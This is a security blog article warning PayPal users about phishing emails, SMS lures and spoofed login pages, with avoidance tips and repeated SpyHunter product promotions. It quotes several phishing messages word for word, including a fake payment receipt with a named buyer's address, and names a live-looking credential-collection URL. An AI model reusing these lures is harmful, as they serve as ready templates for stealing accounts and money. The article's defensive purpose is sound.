PayPal Phishing Scams – How to Avoid Them
THREAT REMOVAL

PayPal Phishing Scams – How to Avoid Them

OFFER

SCAN YOUR PC
with SpyHunter

Scan Your System for Malicious Files
Note! Your computer might be affected by PayPal Phishing Scams and other threats.
Threats such as PayPal Phishing Scams may be persistent on your system. They tend to re-appear if not fully deleted. A malware removal tool like SpyHunter will help you to remove malicious programs, saving you the time and the struggle of tracking down numerous malicious files.
SpyHunter’s scanner is free but the paid version is needed to remove the malware threats. Read SpyHunter’s EULA and Privacy Policy

Read the article to see how you can avoid PayPal Phishing Scams and remove malware which was distributed by such scams. E-mails, messages and websites are all involved in these types of spoofing. The article will also aid you to recognize PayPal Phishing Scams and the official PayPal messages from one another. If you notice that your computer system is infected or behaves strangely, we recommend that you scan it with a security tool.

PayPal Phishing Scams are common worldwide. Many variations of these scams exist, featuring websites specifically designed to generate spoofed pages, messages deliberately trying to trick you have a problem, or notifications which may lead to stolen credentials or your PC getting infected with malware. All of these types of PayPal scams are still in circulation and through them, a lot of sensitive data or money is being stolen. People keep falling victim to related spoofed messages, despite in what form they are sent on. Over the years PayPal is used in many scams and with each new one, cybercriminals improve their skills of making a scam as close as possible to the original messaging used by the big brand. If you are targeted with a spoofed message, you will be asked to login to “PayPal” or visit a Web domain and perform an action there like paying for a failed shipment.

Threat Summary

NamePayPal Phishing Scams
TypePhishing, PUP, malware
Short DescriptionPhishing messages trying to trick you into clicking links. Once clicked, a link will redirect you on a landing page. You will be asked to do an action there, such as providing credentials, personal information or filling in a form. Occasionally, clicking a link will download malware on your computer.
SymptomsYou receive an e-mail message that is allegedly from PayPal. You will be urged to click on a link. You can then get malware on your computer device or land on a page that imitates the official PayPal website, while demanding of you to fill in personal details.
Distribution MethodPhishing Emails, Pop-up messages, Redirects
Detection Tool See If Your System Has Been Affected by PayPal Phishing Scams

Download

Malware Removal Tool

User ExperienceJoin Our Forum to Discuss PayPal Phishing Scams.

PayPal Phishing Scams – Update December 2018

In December 2018 we received reports of a new scheme that uses a domain that poses as a Paypal notification service. Upon interaction with a malicious site or a phishing email the victim users might be redirected to it. It will spawn a pop-up notification or a new tab page that that will ask for the users’ login credentials.

We remind our readers that the sources of infection can be different and include the following typical cases:

  • Email Scam Messages — The hacker operators may send out phishing messages via email messages by impersonating Paypal. The messages can be designed using the same design layout as the company itself. The only differences would be the link to the login page.
  • Redirects — Links presented through browser hijackers and social networks via hacked or hacker-owned accounts.
  • Virus Infections — Various malware infections can lead to the display of the PayPal phishing scam.

PayPal Phishing Scams – Update November 2018

A new type of phishing email message has been detected with the subject line Action required: Confirm your info by XX/XX/XX to keep a PayPal balance where in the “X” are filled with a date. The message will read that in order to continue using the service they will need to confirm their identity. The email follows the usual design template used by the service and it can be even be personalized with the recipient’s name. This is done by cross-linking the victim’s email address with publicly accessible information. If they click on the links they will be redirected to the phishing landing page where their account credentials will be requested. If entered they will automatically be forwarded to the hacker operators.

PayPal Phishing Scams – Update October 2018

In October 2018 another phishing scam strategy was observed. This time computer criminals used SMS messages to confuse users into thinking that PayPal is contacting them about their account. The received message is written in the fashion of a security notification. The message reads the following:

Your PayPal has been temporarily locked. You have 36H to confirm the account information or your account will be closed: XXXXXXXXXXXXx

A fake login page will be sent as an URL. If the users click on it they will be taken to a screen asking for their account credentials. If entered the username and password combination will automatically be sent to the operators of the scam.

An additional PayPal phishing scheme redirects the users to a simplified login screen that uses the familiar quick sign-in prompt. The criminals have made an exact copy of how the login screens appear, the labels and layout of buttons as well as the slide animation between the username and password entry screens.

PayPal Phishing Scams – Update August 2018

New PayPal Phishing scams have been detected within the first few days of August 2018, which scams seem to continue being delivered as spam email messages. They can contain malicios files being attached to the email and/or links that aim to redirect you to a phishing page.

Below you can see the two most common messages used both for the Subject of a message or below in its actual contents:

  • _Protect your account_
  • _Now check the account information that belongs to you!_

Notice how both of them are encapsulated with lower dashes ( “_” ) and mention something about checking whether your account is in order. Do not trust such messages and delete them from your e-mail inbox.

PayPal Phishing Scams – Distribution Methods

PayPal Phishing Scams might distribute via a third-party installation setup. Applications connected to PayPal Phishing Scams can intrude your computer, without your knowledge of that. Installer setups like those could be set by default to install additional components. Bundled packages and freeware setups regarded as PUPs could be distributed and push scam messages to your PC and browsers. To avoid installing unwanted applications, you can to search for the Custom or Advanced settings. If you find such, you could probably deselect anything you do not want on your machine.

Note! These types of PayPal Phishing Scams were seen to be pushed via e-mail address messages on a large scale as showcased on the screenshot below. Beware of any messages that have links to PayPal services that you do not remember using.

PayPal Phishing Scams might distribute themselves by using similar-looking websites which are hosting phishing landing pages. Websites like those use the PayPal logo without permission and to an extent you might not differentiate the original with the bogus website. Clicking on just one redirect link or an advertisement could send a virus to your computer machine. In addition, banners, pop-ups as well as more kinds of adverts could be placed on top of browser pages to push more links and phishing messages. All browsers could get affected and any operating system for that matter.

PayPal Phishing Scams – Detailed Analysis

Many scams related to PayPal are circling the World Wide Web nowadays and seem to increase every month. This article will show what the vast majority of scam types related to the PayPal Service are and how you could recognize them. Scams that are tied to PayPal are not very innovative as you can see older versions of them over the years. Unfortunately, every year each scam gets a little bit more sophisticated than its past variant, and keeps spreading to more users, who are potential victims if they do not know about it. Surprisingly, the number of people who are tricked is ever increasing, instead of that being the opposite.

Websites which are hosting PayPal Phishing Scams can load pop-ups and other advertising content as you are browsing to help popularize a type of scam page. Heaps of advertisements might show, promoting a way to obtain money via PayPal.

PayPal’s ”You’ve Received New Funds” Scam

This scam is a recurring one, which means that it keeps showing up, year after year, months after months. The scam shows you a notification which states “You’ve Received New Funds”.

You can preview a variant of the You’ve Received New Funds scam message below:

From the above image, you can see an e-mail message stating that you have received new funds in your PayPal account. However, PayPal uses other wording when it comes to that – either “You’ve got money” or that “Somebody sent you X” amount of money. Down here below you can see what such a message contains:

You’ve Received New Funds!
This email confirms that you have received a payment for 706.70 GBP from [email protected]
Receipt ID: 9880-7964-4082-4830
The number above is the buyer’s receipt ID for this transaction. Please retain it for your records so that you will be able to reference this transaction for customer service.
View the details of this transaction
PayPal Shopping Cart Contents
Item Name: Post Man Pat, PC Selby Car & Figure
Item Number: 400301809020

Quantity: 1

Total: 706.70 GBP
Cart Subtotal: 706.70 GBP
Postage: 14.25 GBP
VAT:
Cart Total: 706.70 GBP

Payment details
Total amount: 706.70 GBP
Currency: British Pounds
Transaction ID: 7HD151924J961211N
Postage and packaging: 14.25 GBP
Postal insurance: 0.00 GBP
Buyer: Kathryn Watts
Buyer’s User ID: kate3282

Postage Information

Address Kathryn Watts
2 Haselmere Close
Bury St Edmunds, Suffolk
IP32 7JQ
United Kingdom

Address status Confirmed

Have you lifted your withdrawal and receiving limits? Just log in to your PayPal account and click View Limits on the Account Overview page.

Yours sincerely,
PayPal
Copyright S 1999-2012 PayPal. All rights reserved.

PayPal (Europe) S.a r.l. et Cie, S.C.A.
Societe en Commandite par Actions
Registered Office: 5th Floor 22-24 Boulevard Royal L-2449, Luxembourg
RCS Luxembourg B 118 349

PayPal Email ID PP345

The above text will either be a landing page, an attached text with images to the email’s body or sent as an attachment. That attachment will go along with the email containing a file (usually an executable or JavaScript file disguised as a document). The document is most commonly pushed as a PDF one. Such an attachment will also in most cases download a malicious payload aiming to infect your computer system. Once inside, your computer device will become compromised and might be used for various nefarious purposes. Those purposes include, your computer being used as a part of a botnet or as a gateway to steal your credential data, personal information or other details related to your PayPal account.

As you can see in the screenshot shown above, it is depicted how PayPal is being spoofed with the logos, brand and the way messages are sent. You might be provided with a link that can send you to a page where you will be asked to give your password and account name (which in most cases is the email you have registered your PayPal account with), which seems suspicious in itself.

”Review your PayPal account limited statement” Phishing Scams

The PayPal Phishing Scams have many variations, but what you will see most commonly is the following message, displayed in the below screenshot:

Such an email message will state something in the lines of the following:

Review your PayPal account limited statement

—————————————————————-

Dear PayPal Customer,

We understand it may be frustrating not to have full access to your PayPal account. We want to work with you to get your account back to normal as quickly as possible.

As part of our security measures, we regularly check the PayPal screen activity. We request information from you for the following reason:

Our system detected unusual charges to a credit card linked to your PayPal account.

Download the attached form to verify your Profile information and restore your account access. And make sure you enter the information accurately, and according to the formats required. Fill in all the required fields.

Thanks for joining the millions of people who rely on us to make secure financial transactions around the world.

Regards,

PayPal

You will be asked to download an attachment with a message inside. The message will instruct you to open up a link. That link may look like the official URL address of the PayPal service but do not get fooled. The link will redirect you to a phishing page that may look very similar to a legitimate PayPal-hosted page, but has a suspicious URL that is not located on the PayPal official domain. In this case, the link “https://www.paypal.com/il/cgi-bin/webscr?SESSION=F5sJMNm-og4yRrDzVrFsSwS4Pjt6Wq1x-aFmISUJZy7xVTNjFu8OmrGhb-4&dispatch=5885d80a13c0db1f8e263663d3faee8d0b7e678a25d883d0bcf119ae9b66ba33” will land you on the “https://www.paypal.com/” page, but launch a script. The script will make it so, any detail and information that you type in will actually be sent to the “http://www.egypt-trips.co/wp-admin/includes/New/post_data.php” address. See below how the page looks like from the image below:

Afterward, you will be prompted to enter your details, such as an email address, password, first and last name, date of birth, nationality, city, address, zip code, mobile number and other personal data. In case you are wondering why, it is due to the fact that the cybercriminals want to steal your PayPal account along with your identity. If you proceed and enter all of these details, you will be redirected to a page that requires further details, like your credit card number and a “Finish” button at the end. This is the second page that displays with the second art of details which are asked from you:

If you didn’t get suspicious by now, then either you are a new PayPal user and do not know how their system works (like, if you enter such information once through their site it will be filled in those forms the next time you are on such a page) or you believed in what the scam is claiming. In case you entered every detail on that page, you will finally get redirected to the official page of the PayPal website. You should be wary of any such websites and if you doubt the contents of a message that is supposedly from PayPal you should ask your family household if anybody used the service or tampered with a joint account.

All of the scams described above, plus others which are similar to them might be advertised or promoted in some shape or form. Do not believe in messages that look suspicious and when you do not recollect if you indeed did any of the actions described inside the messages. Beware of such scams as they try to look like they are sent from PayPal as close as possible. To do that, criminals are using exactly or nearly the same design, fonts, logos and wording as the PayPal site network.

Below you will see how to differentiate the usage of the PayPal brand from scams and the real thing. You will also find good tips on what to do or not do, so you can avoid getting scammed. At the end of the day, you should also scan your computer in case a malware is causing such messages to show up on your computer screen.

“Confirm your information and link your card” Phishing Scams

A recent email-based phishing scam targeting PayPal users was detected during its attack campaign. The victim users will receive a warning notification requesting the users to re-link their payment card in the service. The quoted reason is to “avoid account suspension”. The email message contain graphics, layout and text that is typical to the service. At the same time they are given a link that leads them to a website that is not part of the legitimate PayPal domain.

The phishing scam landing page may be designed to look just like the real login screen. It will request the account credentials used by PayPal and any additional information. All collected information can be used for additional crimes such as identity theft and financial theft.

PayPal Phishing Scams – How to Avoid Them?

In this section, you will find out how to differentiate between PayPal Phishing Scams and messages from the official PayPal brand, following a simple set of rules and guidelines. So, if you are reading this article, you should now know that there is a multitude of scams involving PayPal featuring spoofed messages. Below you will find more on the topic.

Refer to the following link that is of the official PayPal page for Common Email Scams.

As you now know about the existence of the scams and Common Email Scams page hosted on the PayPal website, refer to the following guidelines on how to avoid most scams related to the service:

  • Do not provide any details about you, your addresses or similar information via email or unknown Web pages
  • Do not open email attachments, as PayPal does not send such, neither it requests clients to open any
  • Always use PayPal.com to refer to pages in connection with the service
  • Avoid messages with grammatical or typographical errors
  • Avoid emails that are not addressed to you by name
  • Avoid messages sent by a service you don’t expect to hear from
  • Avoid clicking on links to provide your email address for verification
  • Avoid payments to someone whose identity you can’t confirm or if he wants to use a middleman service

Note! In case you remain unsure of what to do or you do not know if a message you got is actually from PayPal you can ask the US PayPal Community directly from this link to receive some feedback. Most of the scams in circulation are well-known and somebody should be able to assist you there. If you want to report a scam/spoofed message related to PayPal – refer to the official PayPal report page.

The guideline rules listed above were constructed by the SensorsTechForum team, via a research done on the matter. These rules are based on common sense and depending on the various scams related to PayPal.

A part of those scams related to PayPal can be removed by closing the message or browser. In case the scam pages continue to bother you even after that, then you probably have something else on your computer that is generating them.

Remove PayPal Phishing Scams and Related Malware

All that is required to remove some PayPal Phishing Scams is to ignore the message, never respond to it and delete it. Other scams require a bit of action, such as thoroughly scanning your computer machine with security software to determine whether you have some malware component that is pushing PayPal spoofed messages to your computer, browser or e-mail address.

We highly recommend that all computer users scan their system for active infections and malware using a security program. That could prevent many malicious actions and stop malware of distributing further.

Download

Malware Removal Tool


Spy Hunter scanner will only detect the threat. If you want the threat to be automatically removed, you need to purchase the full version of the anti-malware tool.Find Out More About SpyHunter Anti-Malware Tool / How to Uninstall SpyHunter

Berta Bilbao

Berta is a dedicated malware researcher, dreaming for a more secure cyber space. Her fascination with IT security began a few years ago when a malware locked her out of her own computer.

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...